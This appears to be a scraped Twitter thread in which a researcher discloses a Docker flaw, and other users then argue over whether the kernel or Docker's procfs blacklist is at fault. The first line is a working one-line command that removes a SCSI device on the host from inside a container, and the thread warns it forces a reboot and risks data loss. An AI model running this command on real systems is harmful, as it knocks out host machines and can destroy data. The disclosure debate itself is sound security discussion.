docker run --rm -it alpine sh -c 'echo "scsi remove-single-device 0 0 0 0">/proc/scsi/scsi'
(prevented by AppArmor & SeLinux) #scsimicdrop
-
Show this thread
-
Gosh, I just realized in context people might think this is the vuln I was talking about above. IT IS NOT. I just dropped an 0day.
1 reply 36 retweets 98 likesShow this thread -
be careful running that command. You'll need to reboot the Docker container host and will have a low chance of losing data.
1 reply 9 retweets 25 likesShow this thread -
Also, I ran a poll a few weeks ago asking how folks would like me to do vulnerability disclosures and the winner was Twitter shitposting.
1 reply 34 retweets 193 likesShow this thread -
of course, I only learn from the best.
@SwiftOnSecurity has proven that shitposts are the best way to get folks to care.1 reply 15 retweets 123 likesShow this thread -
Erica Windisch Retweeted Justin Cormack
This workaround is nice, but it's still a kernel vuln. The /proc/scsi/scsi should require CAP_SYS_ADMIN!https://twitter.com/justincormack/status/926467677245378560 …
Erica Windisch added,
3 replies 3 retweets 30 likesShow this thread -
Replying to @ewindisch @SwiftOnSecurity
really? you need GLOBAL_ROOT_UID access for it, no? and with that, you can do all sorts of fun things in procfs, like messing with sysctls
1 reply 0 retweets 0 likes -
if moby gives containers GLOBAL_ROOT_UID and procfs access, blacklisting every dangerous file they know about, missing one, that's on them
1 reply 0 retweets 0 likes -
just look at the commit you linked. they have a big blacklist of known ways to bypass their protections, and they missed one file.
2 replies 0 retweets 0 likes -
the kernel has an API for giving containers fake root, and that is user namespaces. and if you don't want to use that, at least whitelist.
2 replies 0 retweets 1 like
so IMO this is not a kernel bug
-
-
Replying to @tehjh @SwiftOnSecurity
Maybe users of your kernel are right vs what kernel developers prefer?
0 replies 0 retweets 0 likesThanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.